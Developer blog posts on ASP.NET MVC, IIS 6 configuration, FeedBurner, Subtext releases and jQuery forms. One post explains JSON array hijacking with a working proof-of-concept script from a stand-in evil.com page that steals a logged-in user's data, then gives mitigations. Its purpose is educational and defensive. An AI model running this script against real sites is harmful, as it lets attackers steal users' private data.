I think in a production system, I’d probably manually implement RedirectRouteHandler. But while I’m having fun, let’s take it further.

Let’s look at the DelegateRouteHandler to understand this better.

public class DelegateRouteHandler : IRouteHandler {
  public DelegateRouteHandler(Func<RequestContext, IHttpHandler> action) {
    HttpHandlerAction = action;
  }

  public Func<RequestContext, IHttpHandler> HttpHandlerAction {
    get;
    private set;
  }

  public IHttpHandler GetHttpHandler(RequestContext requestContext) {
    var action = HttpHandlerAction;
    if (action == null) {
      throw new InvalidOperationException("No action specified");
    }
    
    return action(requestContext);
  }
}

Notice that the first constructor argument is a Func<RequestContext, IHttpHandler>. This is effectively the contract for an IRouteHandler. This alleviates the need to write new IRouteHandler classes, because we can instead just create an instance of DelegateRouteHandler directly passing in the code we would have put in the custom IRouteHandler implementation. Again, in this implementation, to make things clearer, I inherited from DelegateRouteHandler rather than instantiating it directly. To do that would have sent me to the 7^th^ level of Hades immediately. As it stands, I’m only on the 4^th^ level for what I’ve shown here.

The last thing we need to look at is the DelegateHttpHandler.

public class DelegateHttpHandler : IHttpHandler {

  public DelegateHttpHandler(Action<HttpContext> action, bool isReusable) {
    IsReusable = isReusable;
    HttpHandlerAction = action;
  }

  public bool IsReusable {
    get;
    private set;
  }

  public Action<HttpContext> HttpHandlerAction {
    get;
    private set;
  }

  public void ProcessRequest(HttpContext context) {
    var action = HttpHandlerAction;
    if (action != null) {
    action(context);
    }
  }
}

Again, you simply pass this class an Action<HttpContext> within the constructor which fulfills the contract for IHttpHandler.

The point of all this is to show that when you have interfaces with a single methods, they can often be transformed into a delegate by writing a helper implementation of that interface which accepts delegates that fulfill the same contract, or at least are close enough.

This would allow me to quickly hack up a new route handler without adding two new classes to my project. Of course, the syntax to do so is prohibitively dense that for the sake of those who have to read the code, I’d probably recommend just writing the new classes.

In any case, however you implement it, the Redirect and RedirectPermanent extension methods for handling routes is still quite useful.

personal comments edit

UPDATE: There’s a workaround mentioned in the Google Groups. It’s finally resolved.

Ever since I first started using FeedBurner, I was very happy with the service. It was exactly the type of service I like, fire and forget and it just worked. My bandwidth usage went down and I gained access to a lot of interesting stats about my feed.

When I was first considering it, others warned me about losing control over my RSS feed. That led me to pay for the MyBrand PRO feature which enabled me to burn my feed using my own domain name at http://feeds.haacked.com/haacked by simply creating a CNAME from feeds.haacked.com to feeds.feedburner.com.

The idea was that if I ever wanted to reclaim my feed because something happened to FeedBurner or because I simply wanted to change, I could simply remove the CNAME and serve up my feed itself.

That was the idea at least.

This week, I learned the fatal flaw in that plan. When Google bought FeedBurner, nothing really changed immediately, so I was completely fine with it. But recently, they decided to change the domain over to a google domain. I had assumed they would do a CNAME to their own domain for MyBrand users. Instead, I saw that they were redirecting users to their own domain, thus taking control away from me over my own feed and completely nullifying the whole point of the MyBrand service.

That’s right. People who were subscribed via my feeds.haacked.com domain were being redirected to a google domain.

Ok, perhaps I’m somewhat at fault for ignoring the email on November 25 announcing the transition, but I’m a busy guy and that didn’t leave me much time to plan the transition.

And even if I had, I would have still been screwed. I followed the instructions provided and set up a CNAME from feeds.haacked.com to haackedgmail.feedproxy.ghs.google.com and watched the next day as my subscriber count dropped from 11,000 to 827. I’ve since changed the CNAME back to the feedburner.com domain (I tried several variations of the CNAME beforehand) and am resigned to let the redirect happen for now.

In the meanwhile, I’ve set up a CNAME from feeds3.haacked.com to the one they gave me and it still doesn’t work. At the time I write this, http://feeds3.haacked.com/haacked gives a 404 error.

I’m very disappointed in the haphazard manner they’ve made this transition, but I’m willing to give a second chance if they’d only fix the damn MyBrand service.

asp.net mvc, asp.net comments edit

While at PDC, I met Louis DeJardin and we had some lively discussions on various topics around ASP.NET MVC. He kept bugging me about some view engine called Flint? No… Electricity? No… Spark!

I had heard of it, but never got around to actually playing with it until after the conference. And the verdict is, I really like it.

Spark is a view engine for both Monorail and ASP.NET MVC. It supports multiple content area layouts much like master pages, which is one thing that seems to be lacking in many other view engines I’ve seen, which only support a single content area, correct me if I’m wrong. Not only that, but he’s already included IronPython and IronRuby support.

But what I really like about it is the simple way you effectively data bind HTML elements to code. Let’s start with a simple example. Suppose you have an enumeration of products you’re passing to the view from your controller action. Here’s how you might render it in Spark.

<viewdata model="IEnumerable[[Product]]"/>

<ul class="products">
  <li each="var product in ViewData.Model">${product.ProductName}</li>
</ul>

Note the each attribute of the <li> tag contains a code expression. This will repeat the <li> tag once per product. The <viewdata> element there declares the type of the ViewData.Model property.

Spark still supports using code nuggets <% %> when you absolutely need them. For example, when using the BeginForm method, I needed a using block, so I used the code nuggets.

Just for fun, I redid the views of my Northwind sample to replace all the ASPX views with Spark as a demonstartion of using an alternative view engine. Try it out.

UPDATE: Updated to the latest version of ASP.NET MVC and Spark as of ASP.NET MVC 1.0 RC 2.

asp.net mvc, asp.net comments edit

I’m working to try and keep internal release notes up to date so that I don’t have this huge amount of work when we’re finally ready to release. Yeah, I’m always trying something new by giving procrastination a boot today.

These notes were sent to me by Jacques, a developer on the ASP.NET MVC feature team. I only cleaned them up slightly.

The sections below contain descriptions and possible solutions for known issues that may cause the installer to fail. The solutions have proven successful in most cases.

Visual Studio Add-ins

The ASP.NET MVC installer may fail when certain Visual Studio add-ins are already installed. The final steps of the installation installs and configures the MVC templates in Visual Studio. When the installer encounters a problem during these steps, the installation will be aborted and rolled back. MVC can be installed from a command prompt using msiexec to produce a log file as follows:

msiexec /i AspNetMVCBeta-setup.msi /q /l*v mvc.log

If an error occurred the log file will contain an error message similar to the example below.

MSI (s) (C4:40) [20:45:32:977]: Note: 1: 1722 2: VisualStudio_VSSetup_Command 3: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe 4: /setup

MSI (s) (C4:40) [20:45:32:979]: Product: Microsoft ASP.NET MVC Beta – Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action VisualStudio_VSSetup_Command, location: C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\devenv.exe, command: /setup

This error is usually accompanied by a corresponding event that will be logged in the Windows Event Viewer:

Faulting application devenv.exe, version 9.0.30729.1, time stamp 0x488f2b50, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x006c0061, process id 0x10e0, application start time 0x01c9355ee383bf70

In most cases, removing the add-ins before installing MVC, and then reinstalling the add-ins, will resolve the problem. ASP.NET MVC installations have been known to run into problems when the following add-ins were already installed.:

  • PowerCommands
  • Clone Detective

Cryptographic Services

In a few isolated cases, the Windows Event Viewer may contain an Error event with event source CAPI2 and event ID 513. The event message will contain the following: Cryptograhpic Services failed while processing the OnIdentity() call in the System Writer Object.

The article at http://technet.microsoft.com/en-us/library/cc734021.aspx describes various steps a user can take to correct the problem, but in some cases simply stopping and restarting the Cryptographic services should allow the installation to proceed.

subtext comments edit

A Subtext user found a security flaw which opens up Subtext to potential XSS attacks via comment. This flaw was introduced in Subtext 2.0 by the feature which converts URLs to anchor tags. If you are still on 1.9.5b or before, you are not affected by this issue. If you upgraded to 2.0, then please update to 2.1 as soon as you can.

Note that you can edit comments in the admin section of your blog to fix comments if someone attempts to abuse your comments.

This release has several other bug fixes and usability improvements as well. I started to replace the use of UpdatePanel in some areas with straight up jQuery, which ends up reducing bandwidth usage.

List of bug fixes and changes:

  • Fixed Medium Trust issue by removing calls to UrlAuthorizationModule.CheckUrlAccessForPrincipal which is not allowed from medium trust.
  • Removed email address from RSS feed by default and added Web.config setting to change this in order to protect against spamming.
  • Upgraded Jayrock assembly to fix the issue with VerificationException being thrown.
  • Fixed code which strips HTML from comments when displaying recent comments. Certain cases would cause CPU spike.
  • Fixed Remember Me functionality for the OpenID login.
  • Fixed a bug with adding categories in which an error was displayed, even though the category was added correctly.
  • Fixed a bug in the code to convert URLs to anchor tags.
  • Upgraded jQuery to version 1.2.6
  • Improved the timezone selection UI with jQuery

I was the one who implemented the feature at fault. Unfortunately the way the feature was written made it such that it reversed earlier scrubbing of the HTML due to a mistake in how I used SgmlReader. I apologize for the mistake. It won’t happen again.

Many thanks go out to Adrian Bateman for pointing out the bug and the fix.

Notes for new installations

The install package includes a default Subtext2.1.mdf file for SQL 2005 Express. If you plan to run your blog off of SQL Server Express, installation is as easy as copying the install files to your Web Root. If you’re not using SQL Express, but plan to use SQL Server 2005, you can attach to the supplied .mdf file and use it as your database.

Notes for upgrading

In the app_data folder of the install package, feel free to delete the database files there. They only apply to new installs. Subtext 2.1 does not have any schema changes, so upgrading should be smooth.

Full upgrade instructions are on the Subtext project website.

Download it here. Note that the file Subtext-2.1.0.5.zip is the one you want to use to upgrade your site. The other file contains the source in case you want to build the solution.

subtext comments edit

How many of you out there who use Subtext host it on a hosting provider who does not have ASP.NET 3.5 available? I’d like to make the next version of Subtext 2 take a dependency on 3.5. Note that it wouldn’t have to take a dependency on SP1. Just ASP.NET 3.5 proper as I believe most hosting providers support it.

If you’re stuck with a hosting provider who only supports ASP.NET 2.0 and not 3.5, do leave a comment.

Note that we’re still in the planning stages for Subtext 3, which will be built on ASP.NET MVC. In the meantime, I still plan to update Subtext 2.*. In fact, much of the work we will do for Subtext 3 may be prototyped in 2.* and ported over.

asp.net mvc, asp.net comments edit

UPDATE: If you run ASP.NET MVC on IIS 6 with ASP.NET 4, setting up extensionless URLs just got easier. In most cases, it should just work.

I’ve seen a lot of reports where people have trouble getting ASP.NET MVC up and running on IIS 6. Sometimes the problem is a very minor misconfiguration, sometimes it’s a misunderstanding of how IIS 6 works.

In this post, I want to provide a definitive guide to getting ASP.NET MVC running on IIS 6. I will walk through using the .mvcor .aspx file extension for URLs first, then I will walkthrough using extension-less URLs.

If you’re running into problems with IIS 6 and ASP.NET MVC, I recommend trying to walk through all the steps in this post, even if you’re not interested in using the .mvcor.aspx mapping. Some of the lessons learned here have more to do with how ASP.NET itself works with IIS 6 than anything specific to ASP.NET MVC.

Initial Setup

To make this easy, start Visual Studio and create a new ASP.NET MVC Web Application Projecton the machine with IIS 6. If your IIS 6 machine is on a different machine, you can skip this step. We can deploy the site to the machine later.

After you create the project, right click the project and select Properties. The project properties editor will open up. Select the Web tab and select Use IIS Web Server.Click on the image for a full size view.

Project Properties
Editor

In the project URL, I gave it a virtual application name of Iis6DemoWeb and then checked Create Virtual Directory. A dialog box should appear and you should now have an IIS virtual application (note this is different than a virtual directory, as indicated by the gear looking icon) under your Default Web Site.

IIS 6 Virtual Web
Application

Using a URL File Extensions

When you run the ASP.NET MVC installer, it will set up an ISAPI mapping in IIS 6 to map the .mvc extension to the aspnet_isapi.dll. This is necessary in order for IIS to hand off requests using the .mvc file extension to ASP.NET.

If you’re planning to use extension-less URLs, you can skip this section, but it may be useful to read anyways as it has some information you’ll need to know when setting up extension-less URLs.

Mapping .mvc to ASP.NET

If you plan to use the .mvc URL extension, and are going to deploy to IIS 6 on a machine that does not have ASP.NET MVC installed, you’ll need to create this mapping by performing the following steps.

One nice benefit of using the .aspx extension instead of .mvc is that you don’t have to worry about mapping the .aspx extension. It should already be mapped assuming you have ASP.NET installed properly on the machine.

For the rest of you, start by right clicking on the Virtual Application node (IIS6DemoWeb in this case) and select Properties. You should see the following dialog.

Website
Properties

Make sure you’re on the Virtual Directory tab and select Configuration. Note that you can also choose to make this change on the root website, in which case the tab you’re looking for is Home Directory not Virtual Directory.

This will bring up the Application Configuration dialog which displays a list of ISAPI mappings. Scroll down to see if .mvc is in the list.

application
mappings

In the screenshot, you can see that .mvc is in the list. If it is in the list on your machine, you can skip ahead to the next section. If it’s not in the list for you, let’s add it to the list. You’re going to need to know the path to the aspnet_isapi.dll first. On my machine, it is:

c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll

It might differ on your machine. One easy way to find out is to find the .aspx extension in the list and double click it to bring up the mapping dialog.

extension
mapping

Now you can copy the path in the Executable text box to your clipboard. This is the path you’ll want to map .mvc to.

Click Cancel to go back to the Application Configuration dialog and then click Addwhich will bring up an empty Add/Edit Application Extension Mapping dialog.

Fill in the fields with the exact same values as you saw for .aspx, except the extension should be “.mvc” without the quotes. Click OK and you’re done with the mapping.

Specifying Routes with an Extension

Before we run the application, we need to update the default routes to look for the file extension we chose, whether it be .mvc or .aspx extension. Here is the RegisterRoutes method in my Global.asax.cs file using the .mvc extension. If you want to use the .aspxextension, just replace {controller}.mvc with {controller}.aspx.

public static void RegisterRoutes(RouteCollection routes)
{
  routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

  routes.MapRoute(
    "Default",
    "{controller}.mvc/{action}/{id}",
    new { action = "Index", id = "" }
  );

  routes.MapRoute(
    "Root",
    "",
    new { controller = "Home", action = "Index", id = "" }
  );
}

Note that because the second route, “Default”, has a literal extension as part of the URL segment, it cannot match a request for the application root. That’s why I have a third route named “Root” which can match requests for the application root.

Now, I can hit CTRL+F5 (or browse my website) and I should see the following home page.

Home
Page

And about page.

About
Page

Notice that the URLs contain the .mvc extension.

Uh oh, Houston! We have a problem

Of course, you’re going to want to be able to navigate to the web root for your project. Notice what happens when you navigate to /Iis6DemoWeb.

Root Home
Page

This is a bug in the Default.aspx.cs file included with our default template which I discovered as I was writing this walkthrough. We’ll fix it right away, but I can provide the fix here as it’s insanely easy.

Note: If you received a File Not Found error when visiting the root, then you might not have Default.aspx mapped as a default document. Follow these steps to add Default.aspx as a default document.

As I’ve written before, this file is necessary for IIS 6, IIS 7 Classic Mode, and pre SP1 Cassini, but not IIS 7 Integrated. So if you’re using Cassini with Visual Studio 2008 SP1 and deploying to IIS 7 Integrated, you can delete Default.aspx and its sub-files.

In the meanwhile, the fix is to make the following change.

Change:

HttpContext.Current.RewritePath(Request.ApplicationPath);

To

HttpContext.Current.RewritePath(Request.ApplicationPath, false);

If you created your website in the IIS root rather than a virtual application, you would never have noticed this issue. But in the virtual application, the URL to the stylesheet rendered contained the virtual application name, when it shouldn’t. Changing the second argument to false fixes this.

IIS6 Extension-less URLs

Ok, now we’re ready to try this with extension-less URLs using the infamous “Star mapping” or “Wildcard mapping” feature of IIS 6. I say infamous because there is a lot of concern over the performance implications of doing this. Of course, you should measure the performance of your site for yourself to determine if it is really a problem.

The first step is to go back to the Application Configuration Properties dialog like we did when configuring the .mvc ISAPI mapping (see, I told you that information might come in useful later).

application
mappings

Next to the Wildcard application maps section, click the Insert… button.

wildcard extension
mapping

This brings up the wildcard application mapping dialog. Enter the path to the aspnet_isapi.dll. You can follow the trick we mentioned earlier for getting this path.

Don’t forget to uncheck the Verify that file exists checkbox! This is one of the most common mistakes people make.

If you’ve been following along everything in this post, you’ll need to go back and reset the routes in your Global.asax.cs file to the default routes. You no longer need the .mvc file extension in the routes. At this point, you can also remove Default.aspx if you’d like. It’s not needed.

Now when you browse your site, your URLs will not have a file extension as you can see in the following screenshots.

Home page without
extension

About page without
extension

 

Final Tips

One thing to understand is that an ASP.NET project is scoped to the Website or Virtual Application in which it resides. For example, in the example I have here, we pointed a Virtual Application named IIS6DemoWeb to the directory containing my ASP.NET MVC web application.

Thus, only requests for that virtual application will be handled by my web application. I cannot make a request for http://localhost/ in this case and expect it to be handled by my application. Nor can I expect routing in this application to handle requests for another root directory such as http://localhost/not-my-app/.

This might seem like an obvious thing to say, but I know it trips some people up. Also, in the example I did here, I used a virtual application for demonstration purposes. It’s very easy to point a root Website in IIS to my application and run it in http://localhost/ rather than a virtual application. This is not a problem. I hope you found this helpful.

asp.net comments edit

As I mentioned before, I’m really excited that we’re shipping jQuery with ASP.NET MVC and with Visual Studio moving forward. Just recently, we issued a patch that enables jQuery Intellisense to work in Visual Studio 2008.

But if you’re new to jQuery, you might sit down at your desk ready to take on the web with your knew found JavaScript light saber, only to stare blankly at an empty screen asking yourself, “Is this it?”

See, as exciting and cool as jQuery is, it’s really the vast array of plugins that really give jQuery its star power. Today I wanted to play around with integrating two jQuery plugins – the jQuery Form Plugin used to submit forms asynchronously and the jQuery Validation plugin used to validate input.

Since this is a prototype for something I might patch into Subtext, which still targets ASP.NET 2.0, I used Web Forms for the demo, though what I do here easily applies to ASP.NET MVC.

Here are some screenshots of it in action. When I click the submit button, it validates all the fields. The email field is validated after the input loses focus.

validation

When I correct the data and click “Send Comment”, it will asynchronously display the posted comment.

async-comment-response

Let’s look at the code to make this happen. Here’s the relevant HTML markup in my Default.aspx page:

<div id="comments" ></div>

<form id="form1" runat="server">
<div id="comment-form">
  <p>
    <asp:Label AssociatedControlID="title" runat="server" Text="Title: " />
    <asp:TextBox ID="title" runat="server" CssClass="required" />
  </p>
  <p>
    <asp:Label AssociatedControlID="email" runat="server" Text="Email: " />
    <asp:TextBox ID="email" runat="server" CssClass="required email" />
  </p>
  <p>
    <asp:Label AssociatedControlID="body" runat="server" Text="Body: " />
    <asp:TextBox ID="body" runat="server" CssClass="required" />
  </p>
  <input type="hidden" name="<%= submitButton.ClientID %>" 
    value="Send Comment" />
  <asp:Button runat="server" ID="submitButton" 
    OnClick="OnFormSubmit" Text="Send Comment" />
</div>
</form>

I’ve called out a few important details in code. The top DIV is where I will put the response of the AJAX form post. The CSS classes on the elements provide validation meta-data to the Validation plugin. What the heck is that hidden input doing there?

Notice that hidden input that duplicates the field name of the submit button. That’s the ugly hack part I did. The jQuery Form plugin doesn’t actually submit the value of the input button. I needed that to be submitted in order for the code behind to work. When you click on the submit button, a method named OnFormSubmit gets called in the code behind.

Let’s take a quick look at that method in the code behind.

protected void OnFormSubmit(object sender, EventArgs e) {
    var control = Page.LoadControl("~/CommentResponse.ascx") 
        as CommentResponse;
    control.Title = title.Text;
    control.Email = email.Text;
    control.Body = body.Text;

    var htmlWriter = new HtmlTextWriter(Response.Output);
    control.RenderControl(htmlWriter);
    Response.End();
}

Notice here that I’m just instantiating a user control, setting some properties of the control, and then rendering it to the output stream. I’m able to access the values in the submitted form by accessing the ASP.NET controls.

This is sort of like the Web Forms equivalent of ASP.NET MVC’s partial rendering ala the return PartialView() method. Here’s the code for that user control.

<%@ Control Language="C#" CodeBehind="CommentResponse.ascx.cs" 
    Inherits="WebFormValidationDemo.CommentResponse" %>
<div style="color: blue; border: solid 1px brown;">
    <p>
        Thanks for the comment! This is what you wrote.
    </p>
    <p>
        <label>Title:</label> <%= Title %>
    </p>
    <p>
        <label>Email:</label> <%= Email %>
    </p>
    
    <p>
        <label>Body:</label> <%= Body %>
    </p>
</div>

Along with its code behind.

public partial class CommentResponse : System.Web.UI.UserControl {
    public string Title { get; set; }
    public string Email { get; set; }
    public string Body { get; set; }
}

Finally, let’s look at the script in the head section that ties this all together and makes it work.

<script src="scripts/jquery-1.2.6.min.js" type="text/javascript"></script>
<script src="scripts/jquery.validate.js" type="text/javascript"></script>
<script src="scripts/jquery.form.js" type="text/javascript"></script>
<% if (false) { %>
<script src="scripts/jquery-1.2.6-vsdoc.js" type="text/javascript"></script>
<% } %>
<script type="text/javascript">
    $(document).ready(function() {
        $("#<%= form1.ClientID %>").validate({
            submitHandler: function(form) {
                jQuery(form).ajaxSubmit({
                    target: "#comments"
                });
            }
        });
    });
</script>

The if(false) section is for the jQuery intellisense, which only matters to me at design time, not runtime.

What we’re doing here is getting a reference to the form and calling the validate method on it. This sets up the form for validation based on validation meta data stored in the CSS classes for the form inputs. It’s possible to do this completely external, but one nice thing about this approach is now you can style the fields based on their validation attributes.

We then register the ajaxSubmit method of the jQuery Form plugin as the submit handler for the form. So when the form is valid, it will use the ajaxSubmit method to post the form, which posts it asynchronously. In the arguments to that method, I specify the #comments selector as the target of the form. So the response from the form submission gets put in there.

As I mentioned before, the hidden input just ensures that ASP.NET runs its lifecycle in response to the form post so I can handle the response in the button’s event handler. In ASP.NET MVC, you’d just point this to an action method instead and not worry about adding the hidden input.

In any case, play around with these two plugins as they provide way more rich functionality than what I covered here.

asp.net, code comments edit

I recently learned about a very subtle potential security flaw when using JSON. While subtle, it was successfully demonstrated against GMail a while back. The post, JSON is not as safe as people think it is, covers it well, but I thought I’d provide step-by-step coverage to help make it clear how the exploit works.

The exploit combines Cross Site Request Forgery (CSRF) with a JSON Array hack allowing an evil site to grab sensitive user data from an unsuspecting user. The hack involves redefining the Array constructor, which is totally legal in Javascript.

Let’s walk through the attack step by step. Imagine that you’re logged in to a trusted site. The site makes use of JavaScript which makes GET requests to a JSON service:

GET: /demos/secret-info.json

that returns some sensitive information:

["Philha", "my-confession-to-crimes", 7423.42]

Now you need to be logged in to get this data. If you go to a fresh browser and type in the URL to /demos/secret-info.json, you’ll get redirected to a login page (in my demo, that’s not the case. You’ll have to trust me on this).

But now suppose you accidentally visit evil.com and it has the following scripts in the <head /> section. Notice the second script references the JSON service on the good site.


<script type="text/javascript">
var secrets;

Array = function() {
  secrets = this;
};
</script>

<script src="http://haacked.com/demos/secret-info.json" 
  type="text/javascript"></script>

<script type="text/javascript">

  var yourData = '';
  var i = -1;
  while(secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>

When you visit the page, you will see the following alert dialog…

evil alert message

…which indicates that the site was able to steal your data.

How does this work?

There are two key parts to this attack. The first is that although browsers stop you from being able to make cross-domain HTTP requests via JavaScript, you can still use the src attribute of a script tag to reference a script in another domain and the browser will make a request and load that script.

The worst part of this is that the request for that script file is being made by your browser with your credentials. If your session on that site is still valid, the request will succeed and now your sensitive information is being loaded into your browser as a script.

That might not seem like a problem at this point. So what if the data was loaded into the browser. The browser is on your machine and a JSON response is not typically valid as the source for a JavaScript file. For example, if the response was…

{"d": ["Philha", "my-confession-to-crimes", 7423.42]}

…pointing a script tag to that response would cause an error in the browser. So how’s the evil guy going to get the data from my browser to his site?

Well It turns out that returning a JSON array is valid as the source for a JavaScript script tag. But the array isn’t assigned to anything, so it would evaluate and then get discarded, right?. What’s the big deal?

That’s where the second part of this attack comes into play.

var secrets;
Array = function() {
  secrets = this;
};

JavaScript allows us to redefine the Array constructor. In the evil script above, we redefine the array constructor and assign the array to a global variable we defined. Now we have access to the data in the array and can send it to our evil site.

In the sample I posted above, I just wrote out an alert. But it would be very easy for me to simply document.write a 1 pixel image tag where the URL contains all the data in the JSON response.

Mitigations

One common mitigation is to make sure that your JSON service always returns its response as a non-array JSON object. For example, with ASP.NET Ajax script services, they always append a “d” property to the response, just like I demonstrated above. This is described in detail in this quickstart:

The ASP.NET AJAX library uses the “d” parameter formatting for JSON data. This forces the data in the example to appear in the following form:

{“d” : [“bankaccountnumber”, “$1234.56”] }

Because this is not a valid JavaScript statement, it cannot be parsed and instantiated as a new object in JavaScript. This therefore prevents the cross-site scripting attack from accessing data from AJAX JSON services on other domains.

The Microsoft Ajax client libraries automatically strip the “d” out, but other client libraries, such as JQuery, would have to take the “d” property into account when using such services.

Another potential mitigation, one that ASP.NET Ajax services do by default too, is to only allow POST requests to retrieve sensitive JSON. Since the script tag will only issue a GET request, a JSON service that only responds to POST requests would not be susceptible to this attack, as far as I know.

For those that keep track, this is why I asked on Twitter recently how many use GET requests to a JSON endpoint.

How bad is this?

It seems like this could be extremely bad as not many people know about this vulnerability. After all, if GMail was successfully exploited via this vulnerability, who else is vulnerable?

The good news is that it seems to me that most modern browsers are not affected by this. I have a URL you can click on to demonstrate the exploit, but you have to use FireFox 2.0 or earlier to get the exploit to work. It didn’t work with IE 6, 7, 8, FireFox 3 nor Google Chrome.

Take this all with a grain of salt of course because there may be a more sophisticated version of this exploit that does work with modern browsers.

So the question I leave to you, dear reader, is given all this, is it acceptable to you for a JSON service containing sensitive data to require a POST request to obtain that data, or would that inspire righteous RESTafarian rage?

asp.net mvc comments edit

Pop quiz. What would you expect these three bits of HTML to render?

<!-- no new lines after textarea -->
<textarea>Foo</textarea>

<!-- one new line after textarea -->
<textarea>
Foo</textarea>

<!-- two new lines after textarea -->
<textarea>

Foo</textarea>

The fact that I’m even writing about this might make you suspicious of your initial gut answer. Mine would have been that the first would render a text area with “Foo” on the first line, the second with it on the second line, and the third with it on the third line.

In fact, here’s what it renders using Firefox 3.0.3. I confirmed the same behavior with IE 8 beta 2 and Google Chrome.

three text
areas

Notice that the first two text areas are identical. Why is this important?

Suppose you’re building an ASP.NET MVC website and you call the following bit of code:

<%= Html.TextArea("name", "\r\nFoo") %>

You probably would expect to see the third text area in the screenshot above in which “Foo” is rendered on the second line, not the first.

However, suppose our TextArea helper didn’t factor in the actual behavior that browsers exhibit. You would in this case get the behavior of the second text area in which “Foo” is still on the first line.

Fortunately, our TextArea helper does factor this in and renders the supplied value on the next line after the textarea tag. In my mind, this is very much an edge case, but it was reported as a bug by someone external a while back. Isn’t HTML fun?! ;)